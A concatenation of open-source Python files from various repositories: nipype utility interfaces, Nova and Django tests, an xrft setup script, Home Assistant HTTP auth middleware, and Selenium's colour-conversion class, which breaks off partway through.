# TODO: Set the path to the Repository directory.
if __name__ == '__main__':
if len(sys.argv) < 2:
print >> sys.stderr, 'Usage: ', sys.argv[0],\
'project_ID <mode>' \
'mode - 0 for single file project; ' \
'1 for scan_build; ' \
'2 for single file c++11 project'
sys.exit(-1)
BuildMode = 1
if (len(sys.argv) >= 3):
BuildMode = int(sys.argv[2])
assert((BuildMode == 0) | (BuildMode == 1) | (BuildMode == 2))
addNewProject(sys.argv[1], BuildMode)
| apache-2.0 |
grlee77/nipype | nipype/interfaces/utility.py | 9 | 20150 | # emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
"""Various utilities
Change directory to provide relative paths for doctests
>>> import os
>>> filepath = os.path.dirname( os.path.realpath( __file__ ) )
>>> datadir = os.path.realpath(os.path.join(filepath, '../testing/data'))
>>> os.chdir(datadir)
"""
import os
import re
from cPickle import dumps, loads
import numpy as np
import nibabel as nb
from nipype.external import six
from nipype.utils.filemanip import (filename_to_list, copyfile, split_filename)
from nipype.interfaces.base import (traits, TraitedSpec, DynamicTraitedSpec, File,
Undefined, isdefined, OutputMultiPath,
InputMultiPath, BaseInterface, BaseInterfaceInputSpec)
from nipype.interfaces.io import IOBase, add_traits
from nipype.testing import assert_equal
from nipype.utils.misc import getsource, create_function_from_source
class IdentityInterface(IOBase):
"""Basic interface class generates identity mappings
Examples
--------
>>> from nipype.interfaces.utility import IdentityInterface
>>> ii = IdentityInterface(fields=['a', 'b'], mandatory_inputs=False)
>>> ii.inputs.a
<undefined>
>>> ii.inputs.a = 'foo'
>>> out = ii._outputs()
>>> out.a
<undefined>
>>> out = ii.run()
>>> out.outputs.a
'foo'
>>> ii2 = IdentityInterface(fields=['a', 'b'], mandatory_inputs=True)
>>> ii2.inputs.a = 'foo'
>>> out = ii2.run() # doctest: +SKIP
ValueError: IdentityInterface requires a value for input 'b' because it was listed in 'fields' Interface IdentityInterface failed to run.
"""
input_spec = DynamicTraitedSpec
output_spec = DynamicTraitedSpec
def __init__(self, fields=None, mandatory_inputs=True, **inputs):
super(IdentityInterface, self).__init__(**inputs)
if fields is None or not fields:
raise ValueError('Identity Interface fields must be a non-empty list')
# Each input must be in the fields.
for in_field in inputs:
if in_field not in fields:
raise ValueError('Identity Interface input is not in the fields: %s' % in_field)
self._fields = fields
self._mandatory_inputs = mandatory_inputs
add_traits(self.inputs, fields)
# Adding any traits wipes out all input values set in superclass initialization,
# even it the trait is not in the add_traits argument. The work-around is to reset
# the values after adding the traits.
self.inputs.set(**inputs)
def _add_output_traits(self, base):
undefined_traits = {}
for key in self._fields:
base.add_trait(key, traits.Any)
undefined_traits[key] = Undefined
base.trait_set(trait_change_notify=False, **undefined_traits)
return base
def _list_outputs(self):
#manual mandatory inputs check
if self._fields and self._mandatory_inputs:
for key in self._fields:
value = getattr(self.inputs, key)
if not isdefined(value):
msg = "%s requires a value for input '%s' because it was listed in 'fields'. \
You can turn off mandatory inputs checking by passing mandatory_inputs = False to the constructor." % \
(self.__class__.__name__, key)
raise ValueError(msg)
outputs = self._outputs().get()
for key in self._fields:
val = getattr(self.inputs, key)
if isdefined(val):
outputs[key] = val
return outputs
class MergeInputSpec(DynamicTraitedSpec, BaseInterfaceInputSpec):
axis = traits.Enum('vstack', 'hstack', usedefault=True,
desc='direction in which to merge, hstack requires same number of elements in each input')
no_flatten = traits.Bool(False, usedefault=True, desc='append to outlist instead of extending in vstack mode')
class MergeOutputSpec(TraitedSpec):
out = traits.List(desc='Merged output')
class Merge(IOBase):
"""Basic interface class to merge inputs into a single list
Examples
--------
>>> from nipype.interfaces.utility import Merge
>>> mi = Merge(3)
>>> mi.inputs.in1 = 1
>>> mi.inputs.in2 = [2, 5]
>>> mi.inputs.in3 = 3
>>> out = mi.run()
>>> out.outputs.out
[1, 2, 5, 3]
"""
input_spec = MergeInputSpec
output_spec = MergeOutputSpec
def __init__(self, numinputs=0, **inputs):
super(Merge, self).__init__(**inputs)
self._numinputs = numinputs
add_traits(self.inputs, ['in%d' % (i + 1) for i in range(numinputs)])
def _list_outputs(self):
outputs = self._outputs().get()
out = []
if self.inputs.axis == 'vstack':
for idx in range(self._numinputs):
value = getattr(self.inputs, 'in%d' % (idx + 1))
if isdefined(value):
if isinstance(value, list) and not self.inputs.no_flatten:
out.extend(value)
else:
out.append(value)
else:
for i in range(len(filename_to_list(self.inputs.in1))):
out.insert(i, [])
for j in range(self._numinputs):
out[i].append(filename_to_list(getattr(self.inputs, 'in%d' % (j + 1)))[i])
if out:
outputs['out'] = out
return outputs
class RenameInputSpec(DynamicTraitedSpec):
in_file = File(exists=True, mandatory=True, desc="file to rename")
keep_ext = traits.Bool(desc=("Keep in_file extension, replace "
"non-extension component of name"))
format_string = traits.String(mandatory=True,
desc=("Python formatting string for output "
"template"))
parse_string = traits.String(desc=("Python regexp parse string to define "
"replacement inputs"))
use_fullpath = traits.Bool(False, usedefault=True,
desc="Use full path as input to regex parser")
class RenameOutputSpec(TraitedSpec):
out_file = traits.File(exists=True, desc="softlink to original file with new name")
class Rename(IOBase):
"""Change the name of a file based on a mapped format string.
To use additional inputs that will be defined at run-time, the class
constructor must be called with the format template, and the fields
identified will become inputs to the interface.
Additionally, you may set the parse_string input, which will be run
over the input filename with a regular expressions search, and will
fill in additional input fields from matched groups. Fields set with
inputs have precedence over fields filled in with the regexp match.
Examples
--------
>>> from nipype.interfaces.utility import Rename
>>> rename1 = Rename()
>>> rename1.inputs.in_file = "zstat1.nii.gz"
>>> rename1.inputs.format_string = "Faces-Scenes.nii.gz"
>>> res = rename1.run() # doctest: +SKIP
>>> print res.outputs.out_file # doctest: +SKIP
    'Faces-Scenes.nii.gz' # doctest: +SKIP
>>> rename2 = Rename(format_string="%(subject_id)s_func_run%(run)02d")
>>> rename2.inputs.in_file = "functional.nii"
>>> rename2.inputs.keep_ext = True
>>> rename2.inputs.subject_id = "subj_201"
>>> rename2.inputs.run = 2
>>> res = rename2.run() # doctest: +SKIP
>>> print res.outputs.out_file # doctest: +SKIP
'subj_201_func_run02.nii' # doctest: +SKIP
>>> rename3 = Rename(format_string="%(subject_id)s_%(seq)s_run%(run)02d.nii")
>>> rename3.inputs.in_file = "func_epi_1_1.nii"
>>> rename3.inputs.parse_string = "func_(?P<seq>\w*)_.*"
>>> rename3.inputs.subject_id = "subj_201"
>>> rename3.inputs.run = 2
>>> res = rename3.run() # doctest: +SKIP
>>> print res.outputs.out_file # doctest: +SKIP
'subj_201_epi_run02.nii' # doctest: +SKIP
"""
input_spec = RenameInputSpec
output_spec = RenameOutputSpec
def __init__(self, format_string=None, **inputs):
super(Rename, self).__init__(**inputs)
if format_string is not None:
self.inputs.format_string = format_string
self.fmt_fields = re.findall(r"%\((.+?)\)", format_string)
add_traits(self.inputs, self.fmt_fields)
else:
self.fmt_fields = []
def _rename(self):
fmt_dict = dict()
if isdefined(self.inputs.parse_string):
if isdefined(self.inputs.use_fullpath) and self.inputs.use_fullpath:
m = re.search(self.inputs.parse_string,
self.inputs.in_file)
else:
m = re.search(self.inputs.parse_string,
os.path.split(self.inputs.in_file)[1])
if m:
fmt_dict.update(m.groupdict())
for field in self.fmt_fields:
val = getattr(self.inputs, field)
if isdefined(val):
fmt_dict[field] = getattr(self.inputs, field)
if self.inputs.keep_ext:
fmt_string = "".join([self.inputs.format_string,
split_filename(self.inputs.in_file)[2]])
else:
fmt_string = self.inputs.format_string
return fmt_string % fmt_dict
def _run_interface(self, runtime):
runtime.returncode = 0
_ = copyfile(self.inputs.in_file, os.path.join(os.getcwd(),
self._rename()))
return runtime
def _list_outputs(self):
outputs = self._outputs().get()
outputs["out_file"] = os.path.join(os.getcwd(), self._rename())
return outputs
class SplitInputSpec(BaseInterfaceInputSpec):
inlist = traits.List(traits.Any, mandatory=True,
desc='list of values to split')
splits = traits.List(traits.Int, mandatory=True,
desc='Number of outputs in each split - should add to number of inputs')
squeeze = traits.Bool(False, usedefault=True,
desc='unfold one-element splits removing the list')
class Split(IOBase):
"""Basic interface class to split lists into multiple outputs
Examples
--------
>>> from nipype.interfaces.utility import Split
>>> sp = Split()
>>> _ = sp.inputs.set(inlist=[1, 2, 3], splits=[2, 1])
>>> out = sp.run()
>>> out.outputs.out1
[1, 2]
"""
input_spec = SplitInputSpec
output_spec = DynamicTraitedSpec
def _add_output_traits(self, base):
undefined_traits = {}
for i in range(len(self.inputs.splits)):
key = 'out%d' % (i + 1)
base.add_trait(key, traits.Any)
undefined_traits[key] = Undefined
base.trait_set(trait_change_notify=False, **undefined_traits)
return base
def _list_outputs(self):
outputs = self._outputs().get()
if isdefined(self.inputs.splits):
if sum(self.inputs.splits) != len(self.inputs.inlist):
raise RuntimeError('sum of splits != num of list elements')
splits = [0]
splits.extend(self.inputs.splits)
splits = np.cumsum(splits)
for i in range(len(splits) - 1):
val = np.array(self.inputs.inlist)[splits[i]:splits[i + 1]].tolist()
if self.inputs.squeeze and len(val) == 1:
val = val[0]
outputs['out%d' % (i + 1)] = val
return outputs
class SelectInputSpec(BaseInterfaceInputSpec):
inlist = InputMultiPath(traits.Any, mandatory=True,
desc='list of values to choose from')
index = InputMultiPath(traits.Int, mandatory=True,
desc='0-based indices of values to choose')
class SelectOutputSpec(TraitedSpec):
out = OutputMultiPath(traits.Any, desc='list of selected values')
class Select(IOBase):
"""Basic interface class to select specific elements from a list
Examples
--------
>>> from nipype.interfaces.utility import Select
>>> sl = Select()
>>> _ = sl.inputs.set(inlist=[1, 2, 3, 4, 5], index=[3])
>>> out = sl.run()
>>> out.outputs.out
4
>>> _ = sl.inputs.set(inlist=[1, 2, 3, 4, 5], index=[3, 4])
>>> out = sl.run()
>>> out.outputs.out
[4, 5]
"""
input_spec = SelectInputSpec
output_spec = SelectOutputSpec
def _list_outputs(self):
outputs = self._outputs().get()
out = np.array(self.inputs.inlist)[np.array(self.inputs.index)].tolist()
outputs['out'] = out
return outputs
class FunctionInputSpec(DynamicTraitedSpec, BaseInterfaceInputSpec):
function_str = traits.Str(mandatory=True, desc='code for function')
class Function(IOBase):
"""Runs arbitrary function as an interface
Examples
--------
>>> func = 'def func(arg1, arg2=5): return arg1 + arg2'
>>> fi = Function(input_names=['arg1', 'arg2'], output_names=['out'])
>>> fi.inputs.function_str = func
>>> res = fi.run(arg1=1)
>>> res.outputs.out
6
"""
input_spec = FunctionInputSpec
output_spec = DynamicTraitedSpec
def __init__(self, input_names, output_names, function=None, imports=None,
**inputs):
"""
Parameters
----------
input_names: single str or list
names corresponding to function inputs
output_names: single str or list
names corresponding to function outputs.
has to match the number of outputs
function : callable
callable python object. must be able to execute in an
isolated namespace (possibly in concert with the ``imports``
parameter)
imports : list of strings
list of import statements that allow the function to execute
in an otherwise empty namespace
"""
super(Function, self).__init__(**inputs)
if function:
if hasattr(function, '__call__'):
try:
self.inputs.function_str = getsource(function)
except IOError:
raise Exception('Interface Function does not accept ' \
'function objects defined interactively ' \
'in a python session')
elif isinstance(function, six.string_types):
self.inputs.function_str = dumps(function)
else:
raise Exception('Unknown type of function')
self.inputs.on_trait_change(self._set_function_string,
'function_str')
self._input_names = filename_to_list(input_names)
self._output_names = filename_to_list(output_names)
add_traits(self.inputs, [name for name in self._input_names])
self.imports = imports
self._out = {}
for name in self._output_names:
self._out[name] = None
def _set_function_string(self, obj, name, old, new):
if name == 'function_str':
if hasattr(new, '__call__'):
function_source = getsource(new)
elif isinstance(new, six.string_types):
function_source = dumps(new)
self.inputs.trait_set(trait_change_notify=False,
**{'%s' % name: function_source})
def _add_output_traits(self, base):
undefined_traits = {}
for key in self._output_names:
base.add_trait(key, traits.Any)
undefined_traits[key] = Undefined
base.trait_set(trait_change_notify=False, **undefined_traits)
return base
def _run_interface(self, runtime):
function_handle = create_function_from_source(self.inputs.function_str,
self.imports)
args = {}
for name in self._input_names:
value = getattr(self.inputs, name)
if isdefined(value):
args[name] = value
out = function_handle(**args)
if len(self._output_names) == 1:
self._out[self._output_names[0]] = out
else:
if isinstance(out, tuple) and (len(out) != len(self._output_names)):
raise RuntimeError('Mismatch in number of expected outputs')
else:
for idx, name in enumerate(self._output_names):
self._out[name] = out[idx]
return runtime
def _list_outputs(self):
outputs = self._outputs().get()
for key in self._output_names:
outputs[key] = self._out[key]
return outputs
class AssertEqualInputSpec(BaseInterfaceInputSpec):
volume1 = File(exists=True, mandatory=True)
volume2 = File(exists=True, mandatory=True)
class AssertEqual(BaseInterface):
input_spec = AssertEqualInputSpec
def _run_interface(self, runtime):
data1 = nb.load(self.inputs.volume1).get_data()
data2 = nb.load(self.inputs.volume2).get_data()
assert_equal(data1, data2)
return runtime
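# A minimal sketch (hypothetical file names, hence skipped under doctest) of
# using AssertEqual to compare two volumes voxel-wise:
#
#     >>> ae = AssertEqual(volume1='vol_a.nii', volume2='vol_b.nii') # doctest: +SKIP
#     >>> res = ae.run() # doctest: +SKIP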
class CSVReaderInputSpec(DynamicTraitedSpec, TraitedSpec):
in_file = File(exists=True, mandatory=True, desc='Input comma-seperated value (CSV) file')
header = traits.Bool(False, usedefault=True, desc='True if the first line is a column header')
class CSVReader(BaseInterface):
"""
Examples
--------
>>> reader = CSVReader() # doctest: +SKIP
>>> reader.inputs.in_file = 'noHeader.csv' # doctest: +SKIP
>>> out = reader.run() # doctest: +SKIP
>>> out.outputs.column_0 == ['foo', 'bar', 'baz'] # doctest: +SKIP
True
>>> out.outputs.column_1 == ['hello', 'world', 'goodbye'] # doctest: +SKIP
True
>>> out.outputs.column_2 == ['300.1', '5', '0.3'] # doctest: +SKIP
True
>>> reader = CSVReader() # doctest: +SKIP
>>> reader.inputs.in_file = 'header.csv' # doctest: +SKIP
>>> reader.inputs.header = True # doctest: +SKIP
>>> out = reader.run() # doctest: +SKIP
>>> out.outputs.files == ['foo', 'bar', 'baz'] # doctest: +SKIP
True
>>> out.outputs.labels == ['hello', 'world', 'goodbye'] # doctest: +SKIP
True
>>> out.outputs.erosion == ['300.1', '5', '0.3'] # doctest: +SKIP
True
"""
input_spec = CSVReaderInputSpec
output_spec = DynamicTraitedSpec
_always_run = True
def _append_entry(self, outputs, entry):
for key, value in zip(self._outfields, entry):
outputs[key].append(value)
return outputs
def _parse_line(self, line):
line = line.replace('\n', '')
entry = [x.strip() for x in line.split(',')]
return entry
def _get_outfields(self):
with open(self.inputs.in_file, 'r') as fid:
entry = self._parse_line(fid.readline())
if self.inputs.header:
self._outfields = tuple(entry)
else:
self._outfields = tuple(['column_' + str(x) for x in range(len(entry))])
return self._outfields
def _run_interface(self, runtime):
self._get_outfields()
return runtime
def _outputs(self):
return self._add_output_traits(super(CSVReader, self)._outputs())
def _add_output_traits(self, base):
return add_traits(base, self._get_outfields())
def _list_outputs(self):
outputs = self.output_spec().get()
isHeader = True
for key in self._outfields:
outputs[key] = [] # initialize outfields
with open(self.inputs.in_file, 'r') as fid:
for line in fid.readlines():
if self.inputs.header and isHeader: # skip header line
isHeader = False
continue
entry = self._parse_line(line)
outputs = self._append_entry(outputs, entry)
return outputs
| bsd-3-clause |
psiwczak/openstack | nova/tests/api/openstack/compute/contrib/test_scheduler_hints.py | 6 | 3228 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Copyright 2011 OpenStack LLC.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from nova.api.openstack import compute
from nova.api.openstack.compute import extensions
from nova.api.openstack import wsgi
import nova.db.api
import nova.rpc
from nova import test
from nova.tests.api.openstack import fakes
from nova import utils
UUID = fakes.FAKE_UUID
class SchedulerHintsTestCase(test.TestCase):
def setUp(self):
super(SchedulerHintsTestCase, self).setUp()
self.fake_instance = fakes.stub_instance(1, uuid=UUID)
self.app = compute.APIRouter()
def test_create_server_without_hints(self):
def fake_create(*args, **kwargs):
self.assertEqual(kwargs['scheduler_hints'], {})
return ([self.fake_instance], '')
self.stubs.Set(nova.compute.api.API, 'create', fake_create)
req = fakes.HTTPRequest.blank('/fake/servers')
req.method = 'POST'
req.content_type = 'application/json'
body = {'server': {
'name': 'server_test',
'imageRef': 'cedef40a-ed67-4d10-800e-17455edce175',
'flavorRef': '1',
}}
req.body = utils.dumps(body)
res = req.get_response(self.app)
self.assertEqual(202, res.status_int)
def test_create_server_with_hints(self):
def fake_create(*args, **kwargs):
self.assertEqual(kwargs['scheduler_hints'], {'a': 'b'})
return ([self.fake_instance], '')
self.stubs.Set(nova.compute.api.API, 'create', fake_create)
req = fakes.HTTPRequest.blank('/fake/servers')
req.method = 'POST'
req.content_type = 'application/json'
body = {
'server': {
'name': 'server_test',
'imageRef': 'cedef40a-ed67-4d10-800e-17455edce175',
'flavorRef': '1',
},
'os:scheduler_hints': {'a': 'b'},
}
req.body = utils.dumps(body)
res = req.get_response(self.app)
self.assertEqual(202, res.status_int)
def test_create_server_bad_hints(self):
req = fakes.HTTPRequest.blank('/fake/servers')
req.method = 'POST'
req.content_type = 'application/json'
body = {
'server': {
'name': 'server_test',
'imageRef': 'cedef40a-ed67-4d10-800e-17455edce175',
'flavorRef': '1',
},
'os:scheduler_hints': 'here',
}
req.body = utils.dumps(body)
res = req.get_response(self.app)
self.assertEqual(400, res.status_int)
| apache-2.0 |
rabernat/xrft | setup.py | 1 | 1391 | import os
import versioneer
from setuptools import setup, find_packages
PACKAGES = find_packages()
DISTNAME = 'xrft'
LICENSE = 'MIT'
AUTHOR = 'xrft Developers'
AUTHOR_EMAIL = '[email protected]'
URL = 'https://github.com/xgcm/xrft'
CLASSIFIERS = [
'Development Status :: 4 - Beta',
    'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Intended Audience :: Science/Research',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Topic :: Scientific/Engineering',
]
INSTALL_REQUIRES = ['xarray', 'dask', 'numpy', 'pandas', 'scipy']
EXTRAS_REQUIRE = ['cftime']
SETUP_REQUIRES = ['pytest-runner']
TESTS_REQUIRE = ['pytest >= 2.8', 'coverage']
DESCRIPTION = "Discrete Fourier Transform with xarray"
def readme():
with open('README.rst') as f:
return f.read()
setup(name=DISTNAME,
version=versioneer.get_version(),
cmdclass=versioneer.get_cmdclass(),
license=LICENSE,
author=AUTHOR,
author_email=AUTHOR_EMAIL,
classifiers=CLASSIFIERS,
description=DESCRIPTION,
long_description=readme(),
install_requires=INSTALL_REQUIRES,
setup_requires=SETUP_REQUIRES,
tests_require=TESTS_REQUIRE,
url=URL,
packages=find_packages())
| mit |
SexualHealthInnovations/callisto-core | callisto_core/tests/notification/test_views.py | 2 | 1698 | from unittest import skip
from unittest.mock import ANY, call, patch
from callisto_core.reporting.views import ReportingConfirmationView
from callisto_core.tests.test_base import ReportFlowHelper as ReportFlowTestCase
from callisto_core.tests.utils.api import CustomNotificationApi
@skip("disabled for 2019 summer maintenance - record creation is no longer supported")
class NotificationViewTest(ReportFlowTestCase):
def test_submit_confirmation_admin_email(self):
with patch.object(CustomNotificationApi, "_logging") as api_logging:
self.client_post_report_creation()
self.client_post_reporting_end_step()
api_logging.assert_has_calls(
[
call(
notification_name=ReportingConfirmationView.admin_email_template_name
),
call(report=self.report),
],
any_order=True,
)
def test_submit_confirmation_user_email(self):
with patch.object(CustomNotificationApi, "_logging") as api_logging:
self.client_post_report_creation()
self.client_post_reporting_end_step()
api_logging.assert_has_calls(
[call(notification_name="submit_confirmation")], any_order=True
)
def test_submit_confirmation_slack_notification(self):
with patch.object(CustomNotificationApi, "slack_notification") as api_logging:
self.client_post_report_creation()
self.client_post_reporting_end_step()
api_logging.assert_has_calls(
[call(msg=ANY, type="submit_confirmation")], any_order=True
)
| agpl-3.0 |
lordB8r/polls | ENV/lib/python2.7/site-packages/django/contrib/sites/tests.py | 94 | 2574 | from __future__ import unicode_literals
from django.conf import settings
from django.contrib.sites.models import Site, RequestSite, get_current_site
from django.core.exceptions import ObjectDoesNotExist
from django.http import HttpRequest
from django.test import TestCase
from django.test.utils import override_settings
class SitesFrameworkTests(TestCase):
def setUp(self):
Site(id=settings.SITE_ID, domain="example.com", name="example.com").save()
self.old_Site_meta_installed = Site._meta.installed
Site._meta.installed = True
def tearDown(self):
Site._meta.installed = self.old_Site_meta_installed
def test_save_another(self):
# Regression for #17415
# On some backends the sequence needs reset after save with explicit ID.
# Test that there is no sequence collisions by saving another site.
Site(domain="example2.com", name="example2.com").save()
def test_site_manager(self):
# Make sure that get_current() does not return a deleted Site object.
s = Site.objects.get_current()
self.assertTrue(isinstance(s, Site))
s.delete()
self.assertRaises(ObjectDoesNotExist, Site.objects.get_current)
def test_site_cache(self):
# After updating a Site object (e.g. via the admin), we shouldn't return a
# bogus value from the SITE_CACHE.
site = Site.objects.get_current()
self.assertEqual("example.com", site.name)
s2 = Site.objects.get(id=settings.SITE_ID)
s2.name = "Example site"
s2.save()
site = Site.objects.get_current()
self.assertEqual("Example site", site.name)
@override_settings(ALLOWED_HOSTS=['example.com'])
def test_get_current_site(self):
# Test that the correct Site object is returned
request = HttpRequest()
request.META = {
"SERVER_NAME": "example.com",
"SERVER_PORT": "80",
}
site = get_current_site(request)
self.assertTrue(isinstance(site, Site))
self.assertEqual(site.id, settings.SITE_ID)
# Test that an exception is raised if the sites framework is installed
# but there is no matching Site
site.delete()
self.assertRaises(ObjectDoesNotExist, get_current_site, request)
# A RequestSite is returned if the sites framework is not installed
Site._meta.installed = False
site = get_current_site(request)
self.assertTrue(isinstance(site, RequestSite))
self.assertEqual(site.name, "example.com")
| mit |
JshWright/home-assistant | homeassistant/components/http/auth.py | 3 | 1964 | """Authentication for HTTP component."""
import asyncio
import hmac
import logging
from homeassistant.const import HTTP_HEADER_HA_AUTH
from .util import get_real_ip
from .const import KEY_TRUSTED_NETWORKS, KEY_AUTHENTICATED
DATA_API_PASSWORD = 'api_password'
_LOGGER = logging.getLogger(__name__)
@asyncio.coroutine
def auth_middleware(app, handler):
"""Authenticate as middleware."""
# If no password set, just always set authenticated=True
if app['hass'].http.api_password is None:
@asyncio.coroutine
def no_auth_middleware_handler(request):
"""Auth middleware to approve all requests."""
request[KEY_AUTHENTICATED] = True
return handler(request)
return no_auth_middleware_handler
@asyncio.coroutine
def auth_middleware_handler(request):
"""Auth middleware to check authentication."""
# Auth code verbose on purpose
authenticated = False
if (HTTP_HEADER_HA_AUTH in request.headers and
validate_password(
request, request.headers[HTTP_HEADER_HA_AUTH])):
# A valid auth header has been set
authenticated = True
elif (DATA_API_PASSWORD in request.GET and
validate_password(request, request.GET[DATA_API_PASSWORD])):
authenticated = True
elif is_trusted_ip(request):
authenticated = True
request[KEY_AUTHENTICATED] = authenticated
return handler(request)
return auth_middleware_handler
def is_trusted_ip(request):
"""Test if request is from a trusted ip."""
ip_addr = get_real_ip(request)
return ip_addr and any(
ip_addr in trusted_network for trusted_network
in request.app[KEY_TRUSTED_NETWORKS])
def validate_password(request, api_password):
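    # hmac.compare_digest runs in time independent of how much of the two
    # strings match, so the comparison does not leak the API password through
    # timing differences.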
"""Test if password is valid."""
return hmac.compare_digest(
api_password, request.app['hass'].http.api_password)
| apache-2.0 |
xlzdew/seleniumpr | py/selenium/webdriver/support/color.py | 49 | 11161 | #!/usr/bin/python
# Copyright 2011 Software Freedom Conservancy.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
RGB_PATTERN = r"^\s*rgb\(\s*(\d{1,3})\s*,\s*(\d{1,3})\s*,\s*(\d{1,3})\s*\)\s*$"
RGB_PCT_PATTERN = r"^\s*rgb\(\s*(\d{1,3}|\d{1,2}\.\d+)%\s*,\s*(\d{1,3}|\d{1,2}\.\d+)%\s*,\s*(\d{1,3}|\d{1,2}\.\d+)%\s*\)\s*$"
RGBA_PATTERN = r"^\s*rgba\(\s*(\d{1,3})\s*,\s*(\d{1,3})\s*,\s*(\d{1,3})\s*,\s*(0|1|0\.\d+)\s*\)\s*$"
RGBA_PCT_PATTERN = r"^\s*rgba\(\s*(\d{1,3}|\d{1,2}\.\d+)%\s*,\s*(\d{1,3}|\d{1,2}\.\d+)%\s*,\s*(\d{1,3}|\d{1,2}\.\d+)%\s*,\s*(0|1|0\.\d+)\s*\)\s*$"
HEX_PATTERN = r"#([A-Fa-f0-9]{2})([A-Fa-f0-9]{2})([A-Fa-f0-9]{2})"
HEX3_PATTERN = r"#([A-Fa-f0-9])([A-Fa-f0-9])([A-Fa-f0-9])"
HSL_PATTERN = r"^\s*hsl\(\s*(\d{1,3})\s*,\s*(\d{1,3})%\s*,\s*(\d{1,3})%\s*\)\s*$"
HSLA_PATTERN = r"^\s*hsla\(\s*(\d{1,3})\s*,\s*(\d{1,3})%\s*,\s*(\d{1,3})%\s*,\s*(0|1|0\.\d+)\s*\)\s*$"
class Color(object):
"""
Color conversion support class
Example:
.. code-block:: python
from selenium.webdriver.support.color import Color
print(Color.from_string('#00ff33').rgba)
print(Color.from_string('rgb(1, 255, 3)').hex)
print(Color.from_string('blue').rgba)
"""
@staticmethod
def from_string(str_):
import re
class Matcher(object):
def __init__(self):
self.match_obj = None
def match(self, pattern, str_):
self.match_obj = re.match(pattern, str_)
return self.match_obj
@property
def groups(self):
return () if self.match_obj is None else self.match_obj.groups()
m = Matcher()
if m.match(RGB_PATTERN, str_):
return Color(*m.groups)
elif m.match(RGB_PCT_PATTERN, str_):
rgb = tuple([float(each) / 100 * 255 for each in m.groups])
return Color(*rgb)
elif m.match(RGBA_PATTERN, str_):
return Color(*m.groups)
elif m.match(RGBA_PCT_PATTERN, str_):
rgba = tuple([float(each) / 100 * 255 for each in m.groups[:3]] + [m.groups[3]])
return Color(*rgba)
elif m.match(HEX_PATTERN, str_):
rgb = tuple([int(each, 16) for each in m.groups])
return Color(*rgb)
elif m.match(HEX3_PATTERN, str_):
rgb = tuple([int(each * 2, 16) for each in m.groups])
return Color(*rgb)
elif m.match(HSL_PATTERN, str_) or m.match(HSLA_PATTERN, str_):
return Color._from_hsl(*m.groups)
elif str_.upper() in Colors.keys():
return Colors[str_.upper()]
else:
raise ValueError("Could not convert %s into color" % str_)
@staticmethod
def _from_hsl(h, s, l, a=1):
h = float(h) / 360
s = float(s) / 100
l = float(l) / 100
if s == 0:
r = l
g = r
b = r
else:
            luminosity2 = l * (1 + s) if l < 0.5 else l + s - l * s
            luminosity1 = 2 * l - luminosity2
            def hue_to_rgb(lum1, lum2, hue):
                if hue < 0.0:
                    hue += 1
                if hue > 1.0:
                    hue -= 1
                if hue < 1.0 / 6.0:
                    return lum1 + (lum2 - lum1) * 6.0 * hue
                elif hue < 1.0 / 2.0:
                    return lum2
                elif hue < 2.0 / 3.0:
                    return lum1 + (lum2 - lum1) * ((2.0 / 3.0) - hue) * 6.0
                else:
                    return lum1
            r = hue_to_rgb(luminosity1, luminosity2, h + 1.0 / 3.0)
            g = hue_to_rgb(luminosity1, luminosity2, h)
            b = hue_to_rgb(luminosity1, luminosity2, h - 1.0 / 3.0)
        # Scale unit-interval channels to 0-255; multiplying by 256 would
        # overflow past the top of the channel range at full intensity.
        return Color(round(r * 255), round(g * 255), round(b * 255), a)
def __init__(self, red, green, blue, alpha=1):
self.red = int(red)
self.green = int(green)
self.blue = int(blue)
self.alpha = "1" if float(alpha) == 1 else str(float(alpha) or 0)
@property
def rgb(self):
return "rgb(%d, %d, %d)" % (self.red, self.green, self.blue)
@property
def rgba(self):
return "rgba(%d, %d, %d, %s)" % (self.red, self.green, self.blue, self.alpha)
@property
def hex(self):
return "#%02x%02x%02x" % (self.red, self.green, self.blue)
def __eq__(self, other):
if isinstance(other, Color):
return self.rgba == other.rgba
return NotImplemented
def __ne__(self, other):
result = self.__eq__(other)
if result is NotImplemented:
return result
return not result
def __hash__(self):
return hash((self.red, self.green, self.blue, self.alpha))
def __repr__(self):
return "Color(red=%d, green=%d, blue=%d, alpha=%s)" % (self.red, self.green, self.blue, self.alpha)
def __str__(self):
return "Color: %s" % self.rgba
# Basic, extended and transparent colour keywords as defined by the W3C HTML4 spec
# See http://www.w3.org/TR/css3-color/#html4
Colors = {
"TRANSPARENT": Color(0, 0, 0, 0),
"ALICEBLUE": Color(240, 248, 255),
"ANTIQUEWHITE": Color(250, 235, 215),
"AQUA": Color(0, 255, 255),
"AQUAMARINE": Color(127, 255, 212),
"AZURE": Color(240, 255, 255),
"BEIGE": Color(245, 245, 220),
"BISQUE": Color(255, 228, 196),
"BLACK": Color(0, 0, 0),
"BLANCHEDALMOND": Color(255, 235, 205),
"BLUE": Color(0, 0, 255),
"BLUEVIOLET": Color(138, 43, 226),
"BROWN": Color(165, 42, 42),
"BURLYWOOD": Color(222, 184, 135),
"CADETBLUE": Color(95, 158, 160),
"CHARTREUSE": Color(127, 255, 0),
"CHOCOLATE": Color(210, 105, 30),
"CORAL": Color(255, 127, 80),
"CORNFLOWERBLUE": Color(100, 149, 237),
"CORNSILK": Color(255, 248, 220),
"CRIMSON": Color(220, 20, 60),
"CYAN": Color(0, 255, 255),
"DARKBLUE": Color(0, 0, 139),
"DARKCYAN": Color(0, 139, 139),
"DARKGOLDENROD": Color(184, 134, 11),
